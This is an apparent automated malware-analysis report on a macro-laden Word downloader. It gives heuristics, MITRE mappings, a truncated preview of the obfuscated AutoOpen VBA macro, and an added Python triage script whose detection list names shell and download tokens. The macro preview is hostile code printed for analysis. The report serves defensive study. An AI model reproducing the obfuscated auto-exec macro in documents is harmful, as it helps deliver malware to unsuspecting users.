Verdict: MALICIOUS (risk score 222)
Malware Insights
MITRE ATT&CK mappings:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution
ClamAV identifies the file as Doc.Downloader.Valyria-6595163-0, and the heuristic engine raises high-severity findings for a VBA project with an AutoOpen entry point. The AutoOpen macro is padded with junk arithmetic, random-number and string operations that obscure its control flow, but it contains execution logic, most likely used to fetch and run a secondary payload, which is consistent with the Doc.Downloader signature family. A GetObject call and a legacy WordBasic auto-exec marker are supporting evidence. Note that the WordBasic marker on its own only attests to the old Word macro execution surface, and none of the findings below shows exploitation of a parser flaw: the execution path actually observed is the macro itself (T1059.005), so the T1203 mapping is not backed by evidence in this report.
Heuristics (7)
- ClamAV: Doc.Downloader.Valyria-6595163-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: the document contains VBA macro code.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: the VBA project declares an AutoOpen procedure, which Word runs as soon as the document is opened with macros enabled, with no further user interaction.
- GetObject call [high, OLE_VBA_GETOBJ]: the macro source calls GetObject, which can bind to COM objects and is a common way to obtain a scripting or shell object for payload execution.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This rule catches p-code-only documents and documents where source extraction fails, so it fires even when no visible source is available.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered by this rule and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface; on its own it is not a downloader or parser-CVE attribution.
- Embedded URL [info, EMBEDDED_URL]: one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This particular URL is the standard DrawingML XML namespace identifier that Office writes into documents containing drawing objects; it is not a network indicator and should not be added to blocklists or hunted for.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 77249 bytes | e5acf694462624a5b3dd6319927b1e7d2dbb7135f7f0c11f774f119a25797cec |
Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub BaMIleaYGlyVuceQoj()
XuVAniVYfUjavg = InStr("dyvIJbIXUcy", "dyvIJbIXUcydyvIJbIXUcy")
End Sub
Sub AutoOpen()
Dim PEhuXyQeHeZIFApiq
Dim qYdoHyQoCuD
qYdoHyQoCuD = Log(10)
qYdoHyQoCuD = qYdoHyQoCuD + Log(12)
For PEhuXyQeHeZIFApiq = 6 To 11
Dim GeiIZUTOSiqIN
GeiIZUTOSiqIN = Rnd(101)
If GeiIZUTOSiqIN > 26106 Then
GeiIZUTOSiqIN = Exp(1)
End If
Dim xOzezEcAsOXYloNUMupo
For xOzezEcAsOXYloNUMupo = 1 To 12
Dim nyoKuKESuJeDuFeNIj
nyoKuKESuJeDuFeNIj = Fix(45634)
Next
Dim qeMYmYZAcILOgeGOVZBaWy
Dim XotaKeCAvafiqO
XotaKeCAvafiqO = Rnd(134)
If XotaKeCAvafiqO > 43283 Then
XotaKeCAvafiqO = Exp(4)
End If
Dim juuKagIWIKwcIHoQelyBU
For juuKagIWIKwcIHoQelyBU = 10 To 11
Dim pEPaZAHydeqygiNuNYx
pEPaZAHydeqygiNuNYx = Fix(72383)
Next
qeMYmYZAcILOgeGOVZBaWy = Fix(48907)
Next
Debug.Print "MoCUqoFytALy"
QijYgOiaSidevokHiXEZm = Val("5447.8") & "VYkaiygyaepYz"
On Error Resume Next
JYwOrExaFaXePifOHohyRIKI = InStr("MuxoQECaRAZuxoDAkeQwOT", "MuxoQECaRAZuxoDAkeQwOTMuxoQECaRAZuxoDAkeQwOT")
SXikYHeDIlYteRE = InStr("TohUWaLamaQUMkEkSUdU", "TohUWaLamaQUMkEkSUdUTohUWaLamaQUMkEkSUdU")
Dim TILODehavLAPA
DeBihUfxNIROroxar = Val("60034.10") & "LoHibeBWiJiWygUQ"
Dim xeMavoGyVoKyLoHoJOHitat
For xeMavoGyVoKyLoHoJOHitat = 9 To 10
Dim XONyWofaiERvOVemAqY
XONyWofaiERvOVemAqY = Fix(39534)
Next
For TILODehavLAPA = 4 To 12
Dim vYpoPOpevipDupYh
iwIlAqazUHAiYrOWoK = InStr("KEmiqonyNOPAseHEwITEgu", "KEmiqonyNOPAseHEwITEguKEmiqonyNOPAseHEwITEgu")
deGUKakoWEhOGENAly = InStr("WuKYSneVEsyBAhaKe", "WuKYSneVEsyBAhaKeWuKYSneVEsyBAhaKe")
vYpoPOpevipDupYh = Fix(77245)
TiLeCIiosenYaAvO = InStr("hyPeqaZoBecOb", "hyPeqaZoBecObhyPeqaZoBecOb")
Next
FuJAiRaSluJOGI = Val("9689.10") & "lYCaFIRULOFet"
rYiaravobILuLosa = Val("57368.10") & "CaqAaYFYjojEp"
ZleVItiTeRakOlhaC = 54508
Dim LEfUNEGyxaiXuMOgFpYlo
For LEfUNEGyxaiXuMOgFpYlo = 7 To 10
Dim zYgYDyTIZUPOSi
zYgYDyTIZUPOSi = Fix(47691)
cobaiArUpOqYVEvAh = 27783
Next
Dim jeyLoDyweqaXo
jeyLoDyweqaXo = Rnd(104)
Dim ToCiNEDeLEaIzeTyc
ToCiNEDeLEaIzeTyc = Rnd(106)
If ToCiNEDeLEaIzeTyc > 47470 Then
ToCiNEDeLEaIzeTyc = Exp(6)
End If
If jeyLoDyweqaXo > 13498 Then
Dim HAZDARAaia
HAZDARAaia = Rnd(121)
If HAZDARAaia > 44470 Then
HAZDARAaia = Exp(1)
End If
puTEbOtyFIXATiDOkVYHEX = InStr("JUdxaHAkanujya", "JUdxaHAkanujyaJUdxaHAkanujya")
jeyLoDyweqaXo = Exp(4)
Debug.Print "cWEjyREtuDOKY"
RisiqAhakC = InStr("QubogIvuJOziTAeSEkyHuzI", "QubogIvuJOziTAeSEkyHuzIQubogIvuJOziTAeSEkyHuzI")
End If
Dim laxAKedufiNU
laxAKedufiNU = Log(9)
laxAKedufiNU = laxAKedufiNU + Log(10)
doWuWaKYHohOFYqa = Val("20102.8") & "CaxeRoJYjOZEHA"
Dim qIdITOZaNINUwUVUzeJa
Debug.Print "VaNaOVIdIGyMOWyDycuj"
qIdITOZaNINUwUVUzeJa = Log(4)
FeBEfEvoCyCacOPISOmua = 91087
Debug.Print "xOzOrOPoPwiHaIGaQAgoL"
Dim coaOziFyQuMypeJ
coaOziFyQuMypeJ = Log(4)
coaOziFyQuMypeJ = coaOziFyQuMypeJ + Log(12)
qIdITOZaNINUwUVUzeJa = qIdITOZaNINUwUVUzeJa + Log(10)
MoMiByfEDYgunAtUhaDEdoQY = ""
Dim xNUhOsIWuRaoWEjin
xNUhOsIWuRaoWEjin = Rnd(119)
Dim pkEsyqAaUruKyVagEje
pkEsyqAaUruKyVagEje = Log(3)
pkEsyqAaUruKyVagEje = pkEsyqAaUruKyVagEje + Log(13)
If xNUhOsIWuRaoWEjin > 87610 Then
Debug.Print "RAFYqEvUzyiIsykaKyZI"
Debug.Print "BIcDUCIReuJEpJyZiXiC"
xNUhOsIWuRaoWEjin = Exp(9)
dUeCArYXyt = Val("6893.1") & "puwYmucaDOKUdOlAqoMeBy"
Debug.Print "rqOJIWUaePIzIv"
End If
Dim gOtiaCONW
For gOtiaCONW = 9 To 12
Dim iHadaWOzEvONOWU
iHadaWOzEvONOWU = Fix(84145)
Next
MoMiByfEDYgunAtUhaDEdoQY = MoMiByfEDYgunAtUhaDEdoQY + IIf((304 + 608) = 912, "s", "DWb9m")
upIdOpIqZayMEzakOBUm = Val("5185.1") & "nafeKAiuDabfUPi"
aiGiAtOLiNYXEHySEkYBow = InStr("zUHuDYgafeWUxIXoWYiaaIgA", "zUHuDYgafeWUxIXoWYiaaIgAzUHuDYgafeWUxIXoWYiaaIgA")
NGuwiLhormobUV = InStr
... (truncated)
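The preview above shows the two things the OLE_VBA_AUTOOPEN / OLE_VBA_GETOBJ heuristics key on (an auto-exec entry point plus an object-execution token) and the obfuscation idiom the macro uses to hide its strings: junk arithmetic (Log, Rnd, Fix, InStr on a doubled string) interleaved with string building of the form `v = v + IIf((304 + 608) = 912, "s", "DWb9m")`, where the condition is a constant so exactly one branch is ever taken. The script below is an added example, not the analyzer's code and not part of the original report: it scans extracted VBA source for auto-exec procedure names and execution tokens, and statically folds the constant IIf() pieces back into the string the macro would assemble at runtime. The SAMPLE input is constructed from the first lines of the preview plus a made-up tail (the additional IIf pieces and the GetObject line); the real continuation is truncated in the report, and the token list and verdict labels are this example's own choices.

```python
"""Static triage of extracted VBA source: auto-exec entry points, execution
tokens, and folding of constant-condition IIf() string building.
Added example, stdlib only; not the analyzer's implementation."""
import re

# Procedure names Office runs on its own once macros are enabled.
AUTOEXEC_NAMES = {
    "autoopen", "autoexec", "autoclose", "autoexit", "autonew",
    "document_open", "document_close", "workbook_open", "workbook_close",
}

# Tokens that let a macro reach outside the document (object creation,
# shells, downloaders). Example's own list; matched on word boundaries.
EXEC_TOKENS = [
    "getobject", "createobject", "shell", "wscript.shell", "urldownloadtofile",
    "xmlhttp", "adodb.stream", "powershell", "cmd.exe", "callbyname",
]

PROC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)", re.I)
# IIf((a op b) = c, "t", "f") with integer constants, as in the preview's
#   ... + IIf((304 + 608) = 912, "s", "DWb9m")
IIF_RE = re.compile(
    r'IIf\(\(\s*(\d+)\s*([+\-*])\s*(\d+)\s*\)\s*=\s*(\d+)\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)',
    re.I)
INIT_RE = re.compile(r'^\s*(\w+)\s*=\s*""\s*$')          # v = ""
APPEND_RE = re.compile(r'^\s*(\w+)\s*=\s*\1\s*[+&]\s*(.+?)\s*$')  # v = v + piece


def find_autoexec_procs(src):
    """Declared Sub/Function names that are auto-execution entry points."""
    found = set()
    for line in src.splitlines():
        m = PROC_RE.match(line)
        if m and m.group(1).lower() in AUTOEXEC_NAMES:
            found.add(m.group(1))
    return sorted(found)


def find_exec_tokens(src):
    """Execution-capable tokens present anywhere in the source (case-insensitive)."""
    low = src.lower()
    return sorted(t for t in EXEC_TOKENS
                  if re.search(r"\b" + re.escape(t) + r"\b", low))


def fold_iif(expr):
    """Replace IIf() calls whose condition is a constant integer comparison
    with the literal of the branch that is actually taken."""
    def repl(m):
        a, op, b, c, t, f = m.groups()
        a, b, c = int(a), int(b), int(c)
        res = {"+": a + b, "-": a - b, "*": a * b}[op]
        return '"%s"' % (t if res == c else f)
    return IIF_RE.sub(repl, expr)


def recover_strings(src):
    """Follow `v = ""` then `v = v + <piece>` accumulations and fold each piece
    to a literal where possible; unfoldable pieces become <?> (needs emulation)."""
    acc = {}
    for line in src.splitlines():
        m = INIT_RE.match(line)
        if m:
            acc[m.group(1)] = ""
            continue
        m = APPEND_RE.match(line)
        if m and m.group(1) in acc:
            lit = re.fullmatch(r'"([^"]*)"', fold_iif(m.group(2)))
            acc[m.group(1)] += lit.group(1) if lit else "<?>"
    return acc


def triage(src):
    """Combine the three checks into one result dict with a coarse verdict."""
    procs, toks = find_autoexec_procs(src), find_exec_tokens(src)
    if procs and toks:
        verdict = "auto-exec + execution token"
    elif procs:
        verdict = "auto-exec only"
    elif toks:
        verdict = "execution token only"
    else:
        verdict = "no macro execution indicators"
    return {"autoexec": procs, "exec_tokens": toks,
            "strings": recover_strings(src), "verdict": verdict}


# Constructed input: the opening of the page's macro preview, trimmed, plus a
# made-up tail (the IIf pieces after the first and the GetObject line). The
# report truncates the real continuation; this tail only illustrates the idiom.
SAMPLE = '''Attribute VB_Name = "ThisDocument"
Private Sub BaMIleaYGlyVuceQoj()
XuVAniVYfUjavg = InStr("dyvIJbIXUcy", "dyvIJbIXUcydyvIJbIXUcy")
End Sub
Sub AutoOpen()
Dim qYdoHyQoCuD
qYdoHyQoCuD = Log(10)
qYdoHyQoCuD = qYdoHyQoCuD + Log(12)
On Error Resume Next
MoMiByfEDYgunAtUhaDEdoQY = ""
MoMiByfEDYgunAtUhaDEdoQY = MoMiByfEDYgunAtUhaDEdoQY + IIf((304 + 608) = 912, "s", "DWb9m")
MoMiByfEDYgunAtUhaDEdoQY = MoMiByfEDYgunAtUhaDEdoQY + IIf((100 + 1) = 200, "Q7", "h")
MoMiByfEDYgunAtUhaDEdoQY = MoMiByfEDYgunAtUhaDEdoQY + IIf((5 * 5) = 25, "e", "zz")
MoMiByfEDYgunAtUhaDEdoQY = MoMiByfEDYgunAtUhaDEdoQY + IIf((9 - 2) = 7, "l", "Kq")
MoMiByfEDYgunAtUhaDEdoQY = MoMiByfEDYgunAtUhaDEdoQY + IIf((30 + 1) = 31, "l", "p")
Set oBj = GetObject(MoMiByfEDYgunAtUhaDEdoQY)
End Sub
'''

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run it against the full macros.bas carved by the analyzer rather than the constructed SAMPLE to see how much of the assembled strings can be recovered statically; any `<?>` marker means a piece depends on something other than constant arithmetic (Chr(), Mid(), environment values) and is the point at which to switch to an emulator such as ViperMonkey.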